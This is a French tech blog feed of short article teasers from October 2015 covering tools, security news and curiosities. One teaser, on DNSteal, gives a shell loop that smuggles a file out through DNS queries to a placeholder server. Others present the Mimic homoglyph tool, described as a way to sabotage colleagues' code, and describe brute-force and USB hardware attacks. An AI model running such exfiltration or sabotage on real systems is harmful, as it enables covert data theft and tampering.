Actu du Net

Si vous êtes sous OSX et que vous voulez vous dégourdir un peu les doigts, il existe un outil baptisé Hammerspoon qui permet de faire un peu d'automatisation avec du script Lua. Pour ceux qui ne connaissent pas, le Lua est un langage de script très en vogue dans le secteur du jeu vidéo, mais aussi sur certains systèmes embarqués comme OpenWRT. L'idée avec Hammerspoon, c'est donc d'interagir avec les API d'OSX via le moteur de script Lua, ce qui permet de développer des trucs plutôt souples sous OSX. Voici par exemple un petit Hello World qui ouvrira une fenêtre lorsque vous appuierez sur CMD + ALT + CTRL + W hs.hotkey.bind({"cmd", "alt", "ctrl"}, "W", function() hs.alert…

Hello les amis, J'espère que la semaine a bien commencé pour vous. Hier c'était l'enfer pour moi, car le site a subi pas mal d'attaques. Ça explique pourquoi vous êtes tombés sur des erreurs un peu étranges. Heureusement, mis à part faire ramer le serveur, aucune de ces attaques n'a abouti. (bruteforce sur le WordPress). J'ai quand même amélioré un peu la sécurité histoire de prévenir plutôt que guérir. Bon, je vous laisse, je vais finir mon café et mon lever de soleil ;-) http://korben.info/wp-content/uploads/2015/10/img_20151027_072954-650x488.jpg Cet article merveilleux et sans aucun égal intitulé : Edito du 27/10/2015 ; a été publié sur Korben, le seul site qui t'ai…

Si vous voulez faire un peu d'analyse mémoire sur des appareils qui tournent sous Linux ou basés sur Linux comme Android, je vous présente LiME. LiME pour Linux Memory Extractor est un outil qui permet de réaliser des captures complètes de la mémoire (volatile) d'un autre appareil. Idéal si vous faites un peu de forensics. L'acquisition se fait via l'interface réseau ou directement sur un support type carte SD et l'outil charge son module dans le noyau grâce à la commande insmod, ce qui permet ensuite de lui passer les paramètres qui vont bien pour l'extraction. Voici un exemple qui explique comment charger le module dans le noyau du téléphone Android avec adb : adb push…

Si vous gérez un ou plusieurs sites WordPress (en multi-sites) et que vous cherchez à savoir qui fait quoi dessus, je vous invite à installer WP Security Audit Log. http://korben.info/wp-content/uploads/2015/10/screenshot-1-650x417.png Ce plugin pour WordPress permet de vérifier d'un seul coup d'oeil tous les événements qui concerne la création d'utilisateurs, le changement de rôles, de mots de passe, la modification d'articles, l'activation ou la désactivation de plugins, la création de champs personnalisés, la modification au niveau des widgets, les paramètres du site...etc etc. C'est super fin, car absolument tout est tracé et en fonction des alertes que vous configure…

Si vous voulez faire tourner en bourrique vos collègues développeurs, voici Mimic ! Cet utilitaire est diabolique puisqu'il remplace automatiquement certains points virgules ( présent dans du code source par un point d'interrogation grec (;). Ainsi au moment du debug, vos amis ou ennemis, vont y perdre leur grec, euuuh, leur latin ! http://korben.info/wp-content/uploads/2015/10/f7963ae4-7591-11e5-9b45-f123e42b22f4.png Pour l'installer : pip install git+git://github.com/reinderien/mimic.git Et pour l'utiliser : mimic --list # Show all of the homoglyphs mimic --explain=o # What crazy things can we do with this letter? mimic --me-harder 100 # Type some lines in and mess…

J'ai régulièrement des démonstrations peu subtiles par mes pairs informaticiens, d'un phénomène dont j'aimerais vous parler et qui vous touche peut-être, vous ou vos proches. Lorsque j'étais plus jeune, avec mes copains "accros à l'ordinateur", nous passion des heures à discuter de tout ce que tu nous connaissions et savions faire dans le domaine. Parfois aussi, c'était le concours de celui qui avait la plus grosse. La machine la plus puissante, le meilleur soft, la plus belle astuce... Etc. C'était relativement bon enfant et à titre personnel, ça m'a tiré vers le haut et m'a poussé à toujours en vouloir plus et à en savoir plus. C'est d'ailleurs cette relation de parta…

Vous vous souvenez de l'application Fluid pour Osx qui permettait de transformer n'importe quel site en application ? Malheureusement limitée en fonctionnalités (autrement faut débourser 5€) et basée sur Safari, elle ne vous convenait peut-être pas. Voici donc Epichrome, un équivalent open source qui permet d'encapsuler un site unique dans un navigateur verrouillé basé sur Chrome, ce qui vous donnera le sentiment de lancer des sites web comme des applications osx. http://korben.info/wp-content/uploads/2015/10/capture-de--cran-2015-10-23-21.27.34.pnghttp://korben.info/wp-content/uploads/2015/10/capture-de--cran-2015-10-23-21.37.55.pnghttp://korben.info/wp-content/uploads…

Chez moi j'ai un petit congélo, et j'avoue que parfois, j'oublie des trucs à l'intérieur... Et je ne sais malheureusement pas jusqu'à quand je peux garder tel ou tel truc congelé. Heureusement pour moi et pour vous, mes petits amis de la banquise, le site FreezerLabels a compilé une liste d'aliments et la durée max jusqu'à laquelle on peut les conserver dans notre congélateur. Par exemple, les muffins, ça peut se garder 6 à 12 mois... Je ne voudrais pas voir leur tronche à la sortie quand même. Du rôti de boeuf, ça peut se conserver largement plus d'un an alors qu'un reste de pizza, à peine 1 ou 2 mois. Et évidemment, y'a des trucs qui ne se congèlent pas, comme la laitue…

Si vous lisez mon site (ou d'autres), vous savez surement qu'à chaque fois que vous imprimez un truc sur votre imprimante laser, un marqueur quasi invisible constitué de quelques points de couleur est ajouté sur la feuille. Il s'agit d'un accord entre les grands fabricants d'imprimantes et les services secrets américain afin d'identifier les faux billets (mais aussi la provenance de n'importe quel document). On savait à quoi ça ressemblait, mais on ne savait pas encore comme lire ce code... Et bien grâce à un chercheur de l'EFF, ce code a été percé à jour. Voici donc comment le numéro de série de l'imprimante, la date et l'heure d'impression sont encodés sur les Xerox Doc…

Si vous aimez les trucs vintage, vous allez être ravis puisque la British Library est en train de libérer plus d'un million d'images extraites de livres du 17e, 18e et 19e siècle. http://korben.info/wp-content/uploads/2015/10/lick-650x334.png Pas de copyright donc pour ces illustrations que vous pourrez réutiliser dans toutes vos créations ou pour illustrer vos sites. Les illustrations sont rangées dans des collections arrangées par des bénévoles comme "couvertures de libres", "cyclisme", "espace", "bateaux", "illustration de livres pour enfants"...etc. http://korben.info/wp-content/uploads/2015/10/us-650x368.png Vous pouvez découvrir ces images ici. Cet article merveille…

Si vous voulez un certificat SSL pour votre serveur web, qui soit reconnu officiellement par la plupart des navigateurs, c'est possible et gratuitement avec Let's Encrypt. http://korben.info/wp-content/uploads/2015/10/lets.png Annoncé l'année dernière, ce service proposé par Mozilla, l'EFF, l'Internet Society, Cisco, Automatic...etc va permettre d'améliorer grandement la sécurité des sites web en permettant à tous de se créer un certificat reconnu par la société IdenTrust (autorité certifiante). Pour le moment, Let's Encrypt est en beta privée mais notez la date du 16 novembre dans votre calendrier, car à ce moment-là, chacun pourra générer son propre certificat. Cette i…

Voici un proof of concept intéressant qui s'appelle DNSteal et qui permet de transférer des documents via le net, de manière très discrète en utilisant le protocole DNS. DNSteal est un script python qui fait office de faux serveur DNS et qui peut recevoir en entrée des fichiers. Une fois en place, il suffit par exemple de lancer la commande suivante pour transférer l'image send.png au faux serveur DNS. for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done C'est plutôt rigolo non ? http://korben.info/wp-content/uploads/2015/10/dnssteal-650x438.png DNSteal supporte aussi le transfert multi-fichiers et la compression de ceux-ci. Son développeur s'est fa…

Si vous bossez sur un ordinateur portable (Linux), vous avez dû remarquer que certaines applications vidaient assez rapidement la batterie. Pas cool mais bon, si vous pensez à les fermer à la main, dès que vous débranchez le câble d'alimentation, ça le fait. Si vous y pensez... Pour les autres, les têtes en l'air comme moi, il y a Powermonious, un script (en Go, donc il vous faudra installer Go) qui permet sur votre machine Linux, de stopper automatiquement certaines applications lorsque vous passez sur la batterie et de les relancer lorsque vous rebasculez sur un branchement secteur. Pour fonctionner, Powermonius a besoin de UPower, DBus et Bash et pour l'installer, il f…

Si vous utilisez WordPress pour votre site web, sachez qu'une nouvelle méthode d'attaque par bruteforce découverte au début du mois par la société Sucuri permet à un attaquant de tester de très nombreux identifiants et mots de passe avec une simple requête HTTP. Avec une attaque classique, 1 requête = 1 tentative de login. Mais avec cette attaque qui exploite une faiblesse dans XML-RPC, 1 requête = x tentatives de login. http://korben.info/wp-content/uploads/2015/10/wordpress-xmlrpc-brute-force-amplification.png Évidemment, comme vous ne verrez plus des tonnes de tentatives débouler dans vos logs, cette attaque est plus difficile à détecter. Comme XML-RPC permet de faire …

Le typosquatting est une technique qui consiste à ramasser un peu de trafic en profitant des erreurs des gens. Par exemple, pour venir me rendre visite, vous tapez Korben.info dans votre barre d'adresse. Mais il arrive parfois que certains se trompent et tapent lorben.info ou jorben.info car les touches "l" et "j" sont placées juste à côté de la touche "k". Et là, au lieu de tomber sur une erreur, vous arriverez peut-être sur une page web monétisée avec des trucs de merde qui vont rapporter un peu d'argent au typo-squatteur. Je ne sais pas s'il y a des mecs qui arrivent à gagner leur vie comme ça, mais si vous voulez savoir si votre nom de domaine se fait typosquatter, je…

Si vous pouviez changer de visage, vous iriez décoller celui de qui ? Non, arrêtez de vous prendre pour John Travolta / Nicolas Cage... Maintenant on peut prendre le contrôle du visage de n'importe qui sans pour autant le faire souffrir et avoir recours à de la chirurgie de pointe ! Comment ? Et bien grâce à cette nouvelle technique d'imagerie mise au point par des chercheurs de l'Université de Stanford, de l'Institut Max Planck et de l'Université de Erlangen-Nuremberg en Allemagne. Avec un PC tout ce qu'il y a de plus normal, et une caméra un peu spéciale capable de capturer en 3D les mouvements, la forme et la texture d'un visage, il devient possible de modifier en tem…

Vous étiez plus de 4000 développeurs, lecteurs du blog, à avoir participé à la dernière édition de Coderpower IBM Bluemix. Certains d'entre vous s'étaient même taillés la part du lion en se plaçant en haut du classement des dév spécialistes du Javascript. Et bien la nouvelle saison de la compétition est lancée et j'en suis encore partenaire. Pour les nouveaux, Coderpower c'est une plateforme en ligne proposant des challenges articulés autour de différents langages de programmation et pas mal de développeurs de la communauté Korben.info y participent chaque année. Pour cette nouvelle saison, vous devrez construire, feature après feature, un moteur de recherche prédictif, n…

Je viens de tomber sur un article très intéressant où un journaliste se plaint de Google et plus particulièrement d'Adsense. Son problème est le suivant... En tant que journaliste, il se doit d'informer les gens et il expose pour cela des faits (écrits et photos) qui effectivement peuvent parfois être un peu "graphiques". C'est à dire des images un peu violentes qui sont pourtant nécessaires à l'Histoire et à l'information. Je pense par exemple à cette photo du petit garçon syrien mort sur une plage, aux crimes qui ont lieu partout dans le monde et qu'il faut dénoncer, et dans le cas de ce journaliste, à ces photos des tortures infligées par les militaires américains dans…

Je ne sais pas quand vous avez mis les "pieds" pour la première fois sur Internet mais moi c'était en 97 et mes moteurs de recherche préférés étaient Altavista.com et Astalavista.box.sk :-) Puis Google est arrivé... N'empêche à l'époque Altavista c'était le top du top. D'ailleurs savez vous sur quoi ça tournait ? Et bien vous allez être surpris car Alice Maz de chez Wired a mis la main sur ce mail de 1996 qui décrit la config des différents serveurs nécessaires au fonctionnement du moteur de recherche. http://korben.info/wp-content/uploads/2015/10/wpid-wp-1445175527892.jpg Amusant non ? L'indexeur était quand même une sacrée bête de course pour l'époque. Et vous, votr…

Si vous êtes sous Linux et que vous voulez être absolument certain que l'intégralité de votre trafic passe par le réseau Tor, voici Nipe, un script Perl imaginé par Heitor Gouvea. Nipe installe Tor, déploie une config et crée les règles iptables nécessaires. Ainsi vous serez absolument certain que l'intégralité du trafic entrant et sortant de votre machine transitera via Tor. Pratique si vous n'êtes pas à l'aise avec Iptables. Autrement, vous pouvez aussi jeter un oeil au contenu du script pour voir exactement quelles sont les bonnes règles. Source Cet article merveilleux et sans aucun égal intitulé : Faites passer tout votre trafic via Tor avec ce script ; a été publié s…

Mountain View, Californie, 9h du matin. Bart se lève, les pas vacillants, les yeux englués par un manque évident de sommeil. Encore une journée pourrie à passer dans cet incubateur de merde, encore une journée à trainer sa carcasse dans la silicon valley, à croiser des vieux beaufs aux poches pleines alors que les siennes sont encore vides. Pourtant, Harrison, le pseudo président de cet incubateur, accessoirement créé dans sa maison perso, lui avait vendu du rêve...Un soutien matériel et humain pour développer son app, une présentation aux big boss de la valley et une levée de fond dans les deux semaines après son arrivée...ça faisait deux mois qu'il était là et toujours …

Alors aujourd'hui on va s'amuser ! Si vous cherchez un moyen de faire une bonne blague à un ami ou de partager rapidement avec vos collègues des pages web qui vous plaisent, voici Shove, une extension Chrome qui permet de faire ça en un clic. Tout le monde l'installe, vous ajoutez vos amis et paf, en un clic, vous pouvez balancer n'importe quelle page web sur l'écran de votre ami. Pas de message, pas d'avertissement... rien du tout ! Juste la page web qui débarque comme ça sans prévenir ! http://korben.info/wp-content/uploads/2015/10/shove.png C'est magique ! Mais gaffe à qui vous acceptez dans votre liste de contacts, car les petits farceurs sont légion et le porno-surpr…

Connaissez-vous la dernière lubie du Joint Photographic Expert Group, le groupe d'expert qui supervise le format JPEG ? (ahaha oui, JPEG ça veut dire ça !) Et bien ils aimeraient ajouter le support des DRM dans notre format d'image préféré... Comme pour les vidéos, cela permettrait de verrouiller certaines images pour éviter par exemple que vous ne les voyiez si vous n'avez pas payé... Ou pour tout simplement bloquer leur transfert, leur utilisation ou leur modification si le copyright (marqué dans le DRM) ne vous y autorise pas. Quelle idée de merde ! Évidemment, l'EFF monte au créneau et explique dans ce PDF pourquoi c'est une mauvaise idée. Je vous fait un résumé... 1/…

Généralement chasse gardée d'événements à 10 000 dolls le ticket, cette fois on vous propose de participer à une conférence en ligne sur l'IA et le machine learning sans vous ruinez, où vous pourrez en direct poser vos questions aux experts du domaine. Vous parlerez, algorithme génétique, Intelligence Artificielle appliquée, objets connectés et machine learning, entre autre. Si vous avez peur de vous perdre, aucun soucis, il suffit d'un peu de passion et de l'écoute des intervenants pour éclairer votre lanterne. Si vous aimez développer, si Minority Report est dans un coin de votre tête, si AI de Spielberg vous a fait vous interroger sur la science et ses applications, al…

Si vous n'avez pas encore mis de résine dans vos ports USB, voici une petite news qui devrait vous faire changer d'avis. On le sait tous, les ports USB sont des nids à microbes... On peut se choper un malware (souvenez-vous de Stuxnet) et cela même si l'ordinateur est en air gap (non connecté au réseau), ou si l'intrus utilise une clé genre Rubber Ducky, il peut tranquillement faire sa vie sur l'ordinateur de la victime sans laisser aucune trace. Puis en début d'année, on a vu apparaitre l'USB Killer, une clé capable de cramer les composants d'un ordinateur. C'était déjà impressionnant et voici que Dark Purple, son créateur nous propose l'USB Killer 2.0. http://korben.i…